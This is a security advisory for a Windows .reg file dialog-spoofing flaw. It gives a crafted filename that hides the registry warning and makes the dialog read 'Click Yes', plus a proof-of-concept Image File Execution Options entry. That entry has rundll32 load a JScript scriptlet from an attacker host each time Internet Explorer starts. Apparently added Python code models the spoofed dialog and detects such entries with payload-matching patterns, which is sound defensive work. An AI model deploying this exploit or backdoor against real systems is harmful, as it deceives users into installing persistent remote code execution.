Microsoft Windows .Reg File Dialog Box Message Spoofing 0day


[Product]
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.

[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing

[CVE Reference]
N/A

[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof the default registry warning dialog box presented to an end user. This can trick unsavvy users into choosing the wrong option shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Windows 10), thereby hiding the fact that our attack succeeded.

Normally, when a user opens a .reg file, UAC will launch (if the user runs as Admin); if targeting a non-privileged user we can still hijack HKCU registry settings without having to deal with UAC. After that they get the registry security warning dialog box asking whether they "trust the source", "Are you sure you want to continue?" etc., with a choice of either 'Yes' or 'No' to select from.

However, we can inject our own messages through the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its default security warning message. We achieve this using %-encoded characters in the filename like %n or %r and %0.

For example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us replace the "Are you sure you want to continue?" warning message with "Click Yes" or whatever else we like, potentially making a user think they are cancelling the registry import, as the security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10:
------------------------------------------------------------------------------------------------
Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in <REGFILE> have been successfully added to the registry".

We can obstruct that behavior and deny this secondary registry editor dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25, like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want to use (null), use %3: it will display an Asian character instead but still prevents the secondary registry dialog box. You will have to manually refresh the registry key written to in order to see the values stored when using these dialog denial-of-service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog box; depending on the Windows OS version you will get different results.

% - can be used for obfuscation, e.g. %h%a%t%e = hate
%b - creates white-space
%n - makes a newline
%r - makes a newline
%1 - creates (null); important, as we prevent the second registry dialog from appearing after a successful import!
%0 - important: terminates the string
%25 - (Windows 10) creates (null); important, as we prevent the second registry dialog from appearing after a successful import!
%3 - important, as we prevent the second registry dialog from appearing after a successful import! (but shows an Asian character)
%5 - (Windows 10) duplicates the default registry dialog box message "n" times, once per %5 injected into the filename
%25 - (Windows 7) duplicates the default registry dialog box message "n" times, once per %25 injected into the filename
%2525 - prevents the registry editor from opening
%169 - will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others - change the default language shown in the registry dialog box to Asian characters, etc.

Each injected character can be separated by a percent "%" sign without messing up our spoofed message; we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and the default registry messages are not displayed in the registry dialog box.

The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-Windows-10.reg" in the registry dialog box, along with our spoofed user directions.
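As an added illustration of the filename rendering described above (example code written for this page, not the advisory author's tooling), the following Python models the escape rules the advisory lists and replays them over the PoC filename. The dialog template is reconstructed from the phrases the advisory quotes, the download directory is an assumed placeholder, and only the codes the PoC relies on are modelled (%b, %n, %r, %1/%25 as an embedded NUL, %0 as terminator); version-specific codes such as %3, %5 and %169 are left out. It is a model of the observed behaviour, not regedit's own formatting routine.

```python
"""Model of how the regedit import warning renders a crafted .reg filename.

Added example for this page, not the advisory author's code.  ESCAPES follows the
behaviours the advisory lists, DIALOG_TEMPLATE is reconstructed from the phrases the
advisory quotes, and the whole thing models the observed Windows 10 behaviour rather
than regedit's own formatting routine."""

ESCAPES = {"b": " ", "n": "\n", "r": "\n"}   # white-space, newline, newline
NULL_CODES = ("25", "1")                       # "(null)"; modelled as an embedded NUL
TERMINATOR = "0"                               # %0 ends the message string

# Reconstructed from the wording the advisory quotes.  {path} is where regedit echoes
# the filename back; the model assumes the substitution happens before the escapes
# are processed, which is what lets a %0 in the filename cut off the warning's tail.
DIALOG_TEMPLATE = (
    "If you do not trust the source of this information in {path}, "
    "do not add it to the registry.\n\nAre you sure you want to continue?"
)
ASSUMED_DIR = "C:\\Users\\victim\\Downloads\\"   # placeholder download location


def expand_escapes(text):
    """Apply the % rules to TEXT and return the rendered string (NULs included).

    A '%' followed by an unlisted character echoes that character, which is the
    obfuscation trick (%h%a%t%e -> hate).  Version-specific codes such as %3, %5
    and %169 are not modelled."""
    out, i = [], 0
    while i < len(text):
        if text[i] != "%":
            out.append(text[i])
            i += 1
            continue
        rest = text[i + 1:]
        if not rest:                       # trailing lone '%': echo it
            out.append("%")
            break
        null = next((c for c in NULL_CODES if rest.startswith(c)), None)
        if null is not None:
            out.append("\x00")
            i += 1 + len(null)
        elif rest[0] == TERMINATOR:
            break                          # drop everything after %0, real .reg included
        else:
            out.append(ESCAPES.get(rest[0], rest[0]))
            i += 2
    return "".join(out)


def visible_text(rendered):
    """What a C-string consumer displays: everything before the first NUL."""
    return rendered.split("\x00", 1)[0]


def spoofed_dialog(filename, directory=ASSUMED_DIR):
    """The warning text the victim would see when opening DIRECTORY + FILENAME."""
    composed = DIALOG_TEMPLATE.replace("{path}", directory + filename)
    return visible_text(expand_escapes(composed))


def has_dialog_escapes(filename):
    """Triage rule: a legitimately named .reg file has no '%' in its name at all."""
    return "%" in filename


if __name__ == "__main__":
    POC = ("Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%n"
           "C%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg")
    for name in (POC, "Settings.reg"):
        print(f"--- {name!r} (escapes: {has_dialog_escapes(name)})")
        print(spoofed_dialog(name))
```

Running it prints what the victim sees for the PoC filename beside what an ordinary filename produces: the first ends in "Click Yes" with the "do not add it to the registry" and "Are you sure you want to continue?" text gone, the second shows the full warning. has_dialog_escapes is the cheap triage rule that falls out of the model: a .reg file whose name contains a percent sign has almost certainly been crafted for this dialog and is worth quarantining before it reaches regedit.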

While this spoofing vulnerability requires user interaction and (if targeting an Admin) getting past the Windows UAC prompt to succeed, the fact that we can prevent secondary registry dialogs and modify the registry messages displayed to the user makes it a viable attack vector. If we are successful in our attack we can achieve a persistent RCE backdoor all while the user thinks they have aborted the import. Moreover, targeting a non-privileged user allows us to hijack programs without worrying about UAC. Note that the Image File Execution Options key used in the PoC below lives under HKEY_LOCAL_MACHINE, so that particular payload needs the elevated import; against a non-privileged target the payload has to live under HKEY_CURRENT_USER.

[POC Video URL]
https://vimeo.com/322684636

[Exploit/POC]
Persistent Remote Code Execution Backdoor:

This will add an entry to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" for a persistent rundll32 payload targeting MSIE that references a JScript XML-based file on our remote server.

1) Create a Windows .reg registry file named:

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

Registry file contents:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]

"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://<ATTACKER-IP>/backdoor\")"

2) Create an XML scriptlet file named simply "backdoor" (no extension) and host it at http://ATTACKER-IP/backdoor. It will execute Windows calc.exe whenever Microsoft Internet Explorer is launched.

<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
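As an added example for the PoC above (written for this page, not part of the advisory), the following Python triages a .reg file before it is imported and flags the Image File Execution Options persistence the PoC installs. The sample .reg text is constructed for this example to mirror the PoC alongside a benign debugger entry, and the payload pattern list is this example's own heuristic rather than a Microsoft-documented rule.

```python
"""Triage a .reg file for Image File Execution Options (IFEO) persistence.

Added example for this page, not the advisory author's code.  SAMPLE_REG is
constructed to mirror the PoC plus a benign debugger entry; the payload
patterns are this example's own heuristics."""

import re

IFEO_PREFIX = ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\"
               "CurrentVersion\\Image File Execution Options\\")

# Traits of the PoC's Debugger value; none of them belongs in a real debugger path.
# \bscript: deliberately does not match the "script:" inside "javascript:".
PAYLOAD_PATTERNS = [
    ("rundll32", re.compile(r"\brundll32(\.exe)?\b", re.I)),
    ("javascript-moniker", re.compile(r"javascript:", re.I)),
    ("mshtml-RunHTMLApplication", re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I)),
    ("remote-scriptlet", re.compile(r"\bscript:(https?|ftp)://", re.I)),
]

# Constructed sample: one ordinary key, one benign IFEO debugger, one PoC-style backdoor.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

; constructed sample for this example
[HKEY_CURRENT_USER\Software\ExampleApp]
"Theme"="dark"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\windbg.exe -g"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://<ATTACKER-IP>/backdoor\")"
'''


def unescape_reg_string(s):
    """Undo .reg string escaping (\\\\ -> \\ and \\" -> ") in a single pass."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg(text):
    """Minimal .reg parser returning {key_path: {value_name: data}}.

    Quoted string values are unescaped; other data types (dword:, hex:) are kept
    raw and hex continuation lines are not joined, which is enough for this triage."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";")
                or line.startswith("Windows Registry Editor") or line.upper() == "REGEDIT4"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = name.strip()
        name = "(Default)" if name == "@" else name.strip('"')
        data = data.strip()
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = unescape_reg_string(data[1:-1])
        keys[current][name] = data
    return keys


def ifeo_findings(keys):
    """One finding per Debugger value under IFEO.  Severity is 'high' when the value
    carries any of the PoC's payload traits, otherwise 'review' (a real debugger such
    as windbg is a legitimate, if rare, use of this key)."""
    findings = []
    for key, values in keys.items():
        if not key.lower().startswith(IFEO_PREFIX.lower()):
            continue
        target = key[len(IFEO_PREFIX):]
        for name, data in values.items():
            if name.lower() != "debugger":
                continue
            markers = [label for label, rx in PAYLOAD_PATTERNS if rx.search(data)]
            findings.append({"target": target, "debugger": data, "markers": markers,
                             "severity": "high" if markers else "review"})
    return findings


if __name__ == "__main__":
    for f in ifeo_findings(parse_reg(SAMPLE_REG)):
        print(f"[{f['severity']}] {f['target']}: {f['debugger']}  markers={f['markers']}")
```

Any Debugger value under Image File Execution Options deserves a look, since Windows runs it in place of the named program every time that program starts, which is exactly why the PoC chose it; but a value that launches rundll32 with a javascript: argument, or fetches a script: moniker from a remote URL, has no legitimate use and should be treated as a backdoor. The same patterns apply to a live machine: enumerate the IFEO subkeys under HKLM and run each Debugger value through them.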
